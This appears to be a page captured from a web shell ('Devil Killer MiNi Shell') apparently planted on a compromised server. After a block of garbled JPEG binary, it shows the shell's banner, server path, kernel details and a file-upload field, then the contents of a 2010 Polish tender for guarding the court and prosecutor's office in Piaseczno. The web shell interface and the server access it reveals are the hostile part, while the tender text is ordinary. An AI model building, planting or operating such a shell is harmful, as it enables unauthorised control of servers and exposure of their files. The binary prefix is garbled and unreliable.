JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/29572-N-2010.html

<p class="kh_header"><b>Piaseczno: Ochrona siedziby Sądu Rejonowego i Prokuratury Rejonowej w Piasecznie przy ul. Kościuszki 14.</b><br>
<b>Numer ogłoszenia: 29572 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Piasecznie , ul. Kościuszki 14, 05-500 Piaseczno, woj. mazowieckie, tel. 0-22 703 78 00, faks 0-22 703 78 85.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona siedziby Sądu Rejonowego i Prokuratury Rejonowej w Piasecznie przy ul. Kościuszki 14..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: Ochrona obiektu Sądu Rejonowego i Prokuratury w Piasecznie przy ul. Kościuszki 14 wraz z przyległym do niego terenem.

1. Rodzaj pełnionej służby, obsada i czas pełnienia:

PS-1	-	posterunek stały jednoosobowy całodobowy (7-7) dnia następnego;
PS-2	-	posterunek stały, w godzinach (7-19) w dni robocze dwuosobowy, natomiast w godzinach (19-7) oraz w dni wolne od pracy posterunek jednoosobowy i patrol jednoosobowy.

P-1	-	patrol jednoosobowy w dni robocze, w poniedziałki w godzinach (8-18), od wtorku do piątku w godzinach (8-16).

2. Dyslokacja służby:

PS-1      	-	pomieszczenie monitoringu,
PS-2      	-	wejście-wyjście główne dodatkowo patrol po całym terenie,
P-1        	-	patrol po całym terenie obiektu.
3. Proponowany stan etatowy pracowników ochrony:

    Od 21 lutego 2010 roku, proponuje się wystawienie następujących posterunków (minimalna liczba pracowników Wykonawcy, przewidywana do realizacji przedmiotu zamówienia 9 osób):

a)	Posterunek stały całodobowy jednoosobowy nr 1 (PS-1) - pomieszczenie monitoringu (7-19) i  (19-7).
b)	Posterunek stały całodobowy nr 2 (PS-2) - wejście-wyjście główne (7-19) w dni robocze dwuosobowy, natomiast w godzinach (19-7) oraz w dni wolne od pracy całodobowo, jednoosobowy pełniący obowiązki patrolu po całym terenie.
c)	patrol jednoosobowy w dni robocze (P-1) w poniedziałki w godzinach (8-18), od wtorku do piątku w godzinach (8-16).
4.	Proponowany rodzaj wyposażenia:

a)	Polaryzator elektryczny (niewymagający zezwolenia)	-	4 szt.
b)	Ręczny miotacz gazu (niewymagający zezwolenia)	-	4 szt.
c)	Pałka wielofunkcyjna typu TONFA	-	2 szt.
d)	Kajdanki	-	4 szt.
e)	Ręczny detektor metalu	-	2 szt.
f)	Radiotelefon przenośny	-	4 szt.
g)	Telefon komórkowy (alarmowy)	-	1 szt.

Z uwagi, iż obiekt znajduje się w bezpośrednim sąsiedztwie Komendy Powiatowej Policji w Piasecznie w obecnym czasie nie planuje się wyposażenia pracowników ochrony w broń palną bojową.

5. Posterunek stały całodobowy nr PS- 1 (pomieszczenie monitoringu). 

Pracownik ochrony pełniący służbę na tym posterunku pełni rolę dowódcy zmiany (licencja pracownika ochrony II stopnia), podlega kierownictwu firmy sprawującej ochronę oraz kierownictwu Sądu.
Winien być umundurowany i wyposażony w: polaryzator elektryczny, ręczny miotacz gazu, kajdanki, radiotelefon przenośny, telefon komórkowy.

Do jego zadań należy:

1.	Nadzorowanie i kierowanie pracą podległych pracowników ochrony na danej zmianie.
2.	Nadzór nad pomieszczeniem monitoringu oraz zamontowanymi w nim urządzeniami systemów monitorowania obiektu.
3.	Zapewnienie bezpieczeństwa osób znajdujących się w granicach chronionego obiektu.
4.	Wydawanie środków przymusu bezpośredniego i prowadzenie ich ewidencji.
5.	Załączanie i wyłączanie systemów alarmowych, kontrolowanie ich sprawności, zgłaszanie ewentualnych usterek i podejmowanie działań mających na celu ich usunięcie.
6.	Dokonywanie obchodów obiektu w celu ustalenia bieżącej sytuacji, stanu zagrożenia i ochrony newralgicznych punktów jak również w celu kontroli toku pełnionej służby na podległych posterunkach.
7.	Nadzorowanie systemów monitorowania obiektu oraz podejmowanie działań związanych z ich zadziałaniem, zmierzających do wykrycia i ujęcia sprawców zagrożenia oraz do minimalizacji ewentualnych szkód. 
8.	Prowadzenie depozytu niebezpiecznych przedmiotów oraz związanej z tym dokumentacji.
9.	Prowadzenie dokumentacji służbowej związanej z tokiem pełnionej służby.
10.	Wykonywanie poleceń i zarządzeń kierownictwa Sądu, dotyczących ochrony obiektu.
11.	Współpraca z funkcjonariuszami Policji Sądowej, pełniącymi służbę w obiekcie.
12.	Wykonywanie i realizacja założeń ujętych w Planie Ochrony obiektu, tabeli służby, zarządzeniach i instrukcjach.
13.	Utrzymywanie łączności pomiędzy pracownikami ochrony, bazą oraz grupą interwencyjną.
14.	Przyjmowanie i wydawanie kluczy od pomieszczeń służbowych pracownikom sądu i prokuratury i prowadzenie związanej z tym dokumentacji.
15.	W przypadku zagrożenia lub ewakuacji wyznaczanie zadań pracownikom podległej zmiany.
16.	Informowanie na bieżąco kierownictwa Sądu o ewentualnych zagrożeniach, stanie ochrony oraz podjętych działaniach związanych z zapewnieniem bezpieczeństwa obiektu.
17.	Powiadamianie odpowiednich służb w przypadku wykrycia faktu popełnienia przestępstwa, ujęcia jego sprawcy, zakłócania porządku publicznego, kradzieży lub dewastacji mienia sądowego.
18.	Podejmowanie działań zmierzających do zabezpieczenia miejsc popełnienia przestępstwa lub wykroczenia na terenie chronionego obiektu.
19.	Godne reprezentowanie powagi chronionego urzędu poprzez odpowiedni sposób zachowania oraz dbanie o swój wygląd zewnętrzny.
20.	Właściwe przyjęcie i zdanie służby, które winno polegać na przejęciu 
posterunków wraz z wyposażeniem, sprawdzeniu sprawności instalacji alarmowych, dokonanie obchodu obiektu i odnotowaniu wszystkich uwag, dotyczących zabezpieczeń.
21.	Wykonywanie wszystkich innych poleceń kierownictwa Sądu i zatrudniającej firmy. 

6. Posterunek nr PS- 2 (wejście-wyjście główne) oraz patrol.

W dni robocze w godzinach (7-19) posterunek dwuosobowy, natomiast w godzinach (19-7) oraz w dni wolne od pracy posterunek jednoosobowy i patrol po całym terenie budynku.
Pracownik ochrony pełniący służbę na tym posterunku podlega bezpośrednio dowódcy zmiany, a pośrednio kierownictwu firmy sprawującej ochronę oraz kierownictwu Sądu.
Winien posiadać badania lekarskie o braku przeciwwskazań do pracy w warunkach narażenia na promieniowanie jonizujące, o których mowa w art. 10 ust. 1 ustawy Prawo atomowe (tekst jednolity z dnia 14 lutego 2007r. Dz. U. Nr 42, poz 276 z późn zm.), być umundurowany i wyposażony w: polaryzator elektryczny, ręczny miotacz gazu, kajdanki, pałkę wielofunkcyjną typu TONFA, ręczny detektor metalu oraz radiotelefon przenośny.

Do jego obowiązków należy:

1.	Kontrola osób wchodzących i wychodzących z terenu sądu i prokuratury zgodnie z zarządzeniem Nr 72 2007 Prezesa Sadu Okręgowego w Warszawie.
2.	Zapewnienie bezpieczeństwa osób znajdujących się w granicach chronionego obiektu.
3.	Prowadzenie dokumentacji dotyczącej osób przebywających w obiekcie po godzinach urzędowania.
4.	Wykonywanie zadań wynikających z Planu Ochrony obiektu i innej dokumentacji służbowej oraz zadań zleconych przez dowódcę zmiany.
5.	Zamykanie i otwieranie wejścia głównego do obiektu w wyznaczonych godzinach.
6.	Znajomość obowiązków na wyznaczonym posterunku lub patrolu.
7.	Znajomość przepisów p.poż. i innych obowiązujących w chronionym obiekcie.
8.	Znajomości zasad postępowania w sytuacjach zagrożeń.
9.	Zgłaszanie funkcjonariuszom policji każdego przypadku usiłowania wniesienia na teren obiektu broni palnej, amunicji lub materiału wybuchowego.
10.	Podejmowanie i zgłaszanie policji interwencji dotyczących zakłócenia porządku publicznego, dewastacji mienia, kradzieży oraz przekazanie ujętych osób policji.
11.	Obsługa urządzenia rentgenowskiego służącego do prześwietlania bagażu osób wchodzących. 
12.	Należyte i sumienne wykonywanie zadań służbowych, przestrzeganie dyscypliny pracy.
13.	Godne reprezentowanie powagi chronionego urzędu poprzez dbanie o swój wygląd zewnętrzny oraz odpowiedni sposób zachowania.
14.	Utrzymywanie w sprawności i gotowości do natychmiastowego użycia przydzielonych środków przymusu bezpośredniego i innego wyposażenia. 
15.	Nie opuszczanie posterunku bez zgody dowódcy zmiany.
16.	Wykonywanie wszystkich innych poleceń kierownictwa sądu oraz kierownictwa zatrudniającej firmy. 

Do jego obowiązków podczas patrolu należy:
Patrol jednoosobowy.
Pracownik ochrony pełniący służbę na tym posterunku podlega bezpośrednio dowódcy zmiany, a pośrednio kierownictwu firmy sprawującej ochronę oraz kierownictwu Sądu.
Winien, być umundurowany i wyposażony w: polaryzator elektryczny, ręczny miotacz gazu, kajdanki, pałkę wielofunkcyjną typu TONFA oraz radiotelefon przenośny.

Do jego zadań należy:

1.	Wykonywanie zadań wynikających z Planu Ochrony obiektu i innej dokumentacji służbowej oraz zadań zleconych przez dowódcę zmiany.
2.	Ochrona obiektu i terenu poprzez stałe jego patrolowanie.
3.	Zapewnienie bezpieczeństwa osób znajdujących się w granicach chronionego obiektu.
4.	Ochrona przed zaborem i uszkodzeniem wyposażenia i dokumentów będących własnością Zamawiającego.
5.	Podejmowanie interwencji wobec osób zakłócających porządek publiczny.
6.	Sprawdzanie pomieszczeń oraz zabezpieczeń technicznych tj.: zamki, kłódki, plomby, okna, ogrodzenie, oświetlenie. 
7.	Kontrola obiektu pod względem, bezpieczeństwa, przeciwpożarowym, awarii instalacji kanalizacyjnych i c.o.
8.	Zwracanie uwagi na podejrzane osoby oraz pozostawione torby, plecaki mogące zawierać ładunek wybuchowy.
9.	Reagowanie (skuteczne) w przypadkach jakiegokolwiek zagrożenia - zwłaszcza na sygnały alarmowe odebrane od pracowników sądu i prokuratury.
10.	Utrzymywanie łączności między dowódcą zmiany, pracownikami ochrony ewentualne współdziałanie w podejmowanych interwencjach.
11.	Znajomość obowiązków na wyznaczonym posterunku lub patrolu.
12.	Znajomość przepisów ppoż i innych obowiązujących w chronionym obiekcie.
13.	Znajomości zasad postępowania w sytuacjach zagrożeń.
14.	Zgłaszanie funkcjonariuszom policji każdego przypadku usiłowania wtargnięcia bez stosownych uprawnień lub wniesienia na teren obiektu broni palnej, amunicji lub materiału wybuchowego.
15.	Ujęcie sprawców włamania, kradzieży, dewastacji mienia, zakłócenia porządku publicznego i przekazanie policji.
16.	Należyte i sumienne wykonywanie zadań służbowych, przestrzeganie dyscypliny pracy.
17.	Godne reprezentowanie powagi chronionego urzędu poprzez dbanie o swój wygląd zewnętrzny oraz odpowiedni sposób zachowania.
18.	Utrzymywanie w sprawności i gotowości do natychmiastowego użycia przydzielonych środków przymusu bezpośredniego i innego wyposażenia. 
19.	Nie opuszczanie posterunku bez zgody dowódcy zmiany.
20.	Wykonywanie wszystkich innych poleceń kierownictwa sądu oraz kierownictwa zatrudniającej firmy. 

7. Patrol nr P-1 (teren całego obiektu).

Patrol jednoosobowy.
Pracownik ochrony pełniący służbę na tym posterunku podlega bezpośrednio dowódcy zmiany, a pośrednio kierownictwu firmy sprawującej ochronę oraz kierownictwu Sądu.
Winien, być umundurowany i wyposażony w: polaryzator elektryczny, ręczny miotacz gazu, kajdanki, pałkę wielofunkcyjną typu TONFA oraz radiotelefon przenośny.

Do jego zadań należy:

1.	Wykonywanie zadań wynikających z Planu Ochrony obiektu i innej dokumentacji służbowej oraz zadań zleconych przez dowódcę zmiany.
2.	Całodobowa ochrona obiektu i terenu poprzez stałe jego patrolowanie.
3.	Zapewnienie bezpieczeństwa osób znajdujących się w granicach chronionego obiektu.
4.	Ochrona przed zaborem i uszkodzeniem wyposażenia i dokumentów będących własnością Zamawiającego.
5.	Podejmowanie interwencji wobec osób zakłócających porządek publiczny.
6.	Sprawdzanie pomieszczeń oraz zabezpieczeń technicznych tj.: zamki, kłódki, plomby, okna, ogrodzenie, oświetlenie. 
7.	Kontrola obiektu pod względem, bezpieczeństwa, przeciwpożarowym, awarii instalacji kanalizacyjnych i c.o.
8.	Zwracanie uwagi na podejrzane osoby oraz pozostawione torby, plecaki mogące zawierać ładunek wybuchowy.
9.	Reagowanie (skuteczne) w przypadkach jakiegokolwiek zagrożenia - zwłaszcza na sygnały alarmowe odebrane od pracowników sądu i prokuratury.
10.	Utrzymywanie łączności między dowódcą zmiany, pracownikami ochrony ewentualne współdziałanie w podejmowanych interwencjach.
11.	Znajomość obowiązków na wyznaczonym posterunku lub patrolu.
12.	Znajomość przepisów ppoż i innych obowiązujących w chronionym obiekcie.
13.	Znajomości zasad postępowania w sytuacjach zagrożeń.
14.	Zgłaszanie funkcjonariuszom policji każdego przypadku usiłowania wtargnięcia bez stosownych uprawnień lub wniesienia na teren obiektu broni palnej, amunicji lub materiału wybuchowego.
15.	Ujęcie sprawców włamania, kradzieży, dewastacji mienia, zakłócenia porządku publicznego i przekazanie policji.
16.	Należyte i sumienne wykonywanie zadań służbowych, przestrzeganie dyscypliny pracy.
17.	Godne reprezentowanie powagi chronionego urzędu poprzez dbanie o swój wygląd zewnętrzny oraz odpowiedni sposób zachowania.
18.	Utrzymywanie w sprawności i gotowości do natychmiastowego użycia przydzielonych środków przymusu bezpośredniego i innego wyposażenia. 
19.	Nie opuszczanie posterunku bez zgody dowódcy zmiany.
20.	Wykonywanie wszystkich innych poleceń kierownictwa sądu oraz kierownictwa zatrudniającej firmy. 

Przewiduje się możliwość konwojowania przez wykonawcę zamówienia wartości pieniężnych oraz przesyłek zawierających informacje niejawne na dodatkowe zlecenie Sądu Rejonowego w Piasecznie, w miarę potrzeb. Przewiduje się do 100 konwojów w ciągu całego okresu wykonywania umowy.

      Do obowiązków wykonawcy zamówienia należy w ramach normalnego toku służby, konwojowanie (ochrona osoby przenoszącej lub przewożącej) przesyłkę zawierających informacje niejawne na terenie Sądu Rejonowego w Piasecznie oraz terenie miasta Piaseczno. Wszystkie konwoje wykonywane  poza miejscowość będącą siedzibą Sądu wykonywane będą na dodatkowe zlecenie, o którym mowa powyżej. 
     
       Konwojowanie przesyłek niejawnych na terenie Sądu i na terenie miasta Piaseczno - do budynku Policji (przesyłki bliskie), nie wymaga uzbrojenia pracowników ochrony (zgodnie z § 11 ust. 5 rozporządzenia Prezesa Rady Ministrów z dnia 29 września 2005 r. w sprawie trybu i sposobu przyjmowania, przewożenia, wydawania i ochrony materiałów zawierających informacje niejawne - Dz. U. Nr 200, poz. 1650).
W zakresie ww. konwojów pracownik ochrony musi posiadać co najmniej:
1. 	licencję pracownika ochrony fizycznej pierwszego stopnia, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.);
2. 	poświadczenie bezpieczeństwa uprawniające do dostępu do informacji niejawnych o klauzuli co najmniej poufne, zgodne ze wzorem zawartym w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 23 lutego 1999 r. w sprawie wzoru poświadczenia bezpieczeństwa oraz wzoru odmowy wydania poświadczenia bezpieczeństwa (Dz. U. Nr 18, poz. 165 z późn. zm.). Osoby, które uzyskały poświadczenie bezpieczeństwa po terminie wejścia w życie rozporządzenia Prezesa Rady Ministrów z dnia 25 sierpnia 2005 r. w sprawie wzorów poświadczenia bezpieczeństwa, decyzji o odmowie wydania poświadczenia bezpieczeństwa oraz decyzji o cofnięciu poświadczenia bezpieczeństwa (Dz. U. Nr 171, poz. 1431), przedstawiają poświadczenie wg wzoru określonego tym rozporządzeniem. Poświadczenie bezpieczeństwa musi być ważne w okresie wykonywania umowy.
   
         Do konwojowania przesyłek zawierających informacje niejawne stanowiące tajemnicę państwową poza miejscowość będącą siedzibą Sądu wykonawca dysponować musi pojazdem spełniającym wymogi określone w § 10 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 29 września 2005 r. w sprawie trybu i sposobu przyjmowania, przewożenia, wydawania i ochrony materiałów zawierających informacje niejawne (Dz. U. Nr 200, poz. 1650), a także wskazać do wykonania zamówienia co najmniej dwóch pracowników ochrony konwojentów posiadających:
1.  	licencję pracownika ochrony fizycznej co najmniej pierwszego stopnia, zgodnie z ustawą z  dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221);
2.  	ważne w okresie wykonywania umowy poświadczenie bezpieczeństwa uprawniające do dostępu do informacji niejawnych o klauzuli co najmniej poufne, zgodne ze wzorem zawartym w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 23 lutego 1999 r. w sprawie wzoru poświadczenia bezpieczeństwa oraz wzoru odmowy wydania poświadczenia bezpieczeństwa (Dz. U. Nr 18, poz. 165 z późn. zm.). Osoby, które uzyskały poświadczenie bezpieczeństwa po terminie wejścia w życie rozporządzenia Prezesa Rady Ministrów z dnia 25 sierpnia 2005 r. w sprawie wzorów poświadczenia bezpieczeństwa, decyzji o odmowie wydania poświadczenia bezpieczeństwa oraz decyzji o cofnięciu poświadczenia bezpieczeństwa (Dz. U. Nr 171, poz. 1431), przedstawiają poświadczenie wg wzoru określonego tym rozporządzeniem;
3.   	dopuszczenie pracownika ochrony do pracy z bronią palną bojową zgodnie z ustawą z dnia 21 maja 1999r. o broni i amunicji (t.j. Dz. U. z 2004 r. Nr 52, poz. 525 z późn. zm.)

	Do konwojowania wartości pieniężnych wymagania dotyczące środka transportu są takie same jak do konwojowania przesyłek niejawnych, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 14 października 1998 r. w sprawie szczegółowych zasad i wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz. U. Nr 129, poz. 858 z późn. zm.)
        Wymagania dotyczące konwojentów są takie same jak w przypadku konwojowania przesyłek niejawnych. Wykonawca powinien skierować co najmniej dwóch pracowników ochrony posiadających:
1.  	licencję pracownika ochrony fizycznej co najmniej pierwszego stopnia, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145, poz. 1221);
2.  	ważne w okresie wykonywania umowy poświadczenie bezpieczeństwa uprawniające do dostępu do informacji niejawnych o klauzuli co najmniej poufne, zgodne ze wzorem zawartym w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 23 lutego 1999 r. w sprawie wzoru poświadczenia bezpieczeństwa oraz wzoru odmowy wydania poświadczenia bezpieczeństwa (Dz. U. Nr 18, poz. 165 z późn. zm.). Osoby, które uzyskały poświadczenie bezpieczeństwa po terminie wejścia w życie rozporządzenia Prezesa Rady Ministrów z dnia 25 sierpnia 2005 r. w sprawie wzorów poświadczenia bezpieczeństwa, decyzji o odmowie wydania poświadczenia bezpieczeństwa oraz decyzji o cofnięciu poświadczenia bezpieczeństwa (Dz. U. Nr 171, poz. 1431), przedstawiają poświadczenie wg wzoru określonego tym rozporządzeniem;
3. 	dopuszczenie pracownika ochrony do pracy z bronią palną bojową z ustawą z dnia 21 maja 1999r. o broni i amunicji (t.j. Dz. U. z 2004 r. Nr 52, poz. 525 z późn. zm.).
         Wykonawca powinien skierować do wykonywania konwojów wartości pieniężnych w ilości od 5 do 15 jednostek obliczeniowych co najmniej dwóch konwojentów, natomiast do konwojowania wartości pieniężnych w ilości do 5 jednostek obliczeniowych co najmniej jednego konwojenta. 

	Zamawiający zakłada w okresie 12 miesięcy wykonanie do 23000 roboczogodzin pracy pracowników ochrony oraz 100 konwojów. W przypadku wcześniejszego wykonania określonej liczby roboczogodzin i ilości konwojów umowa wygasa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

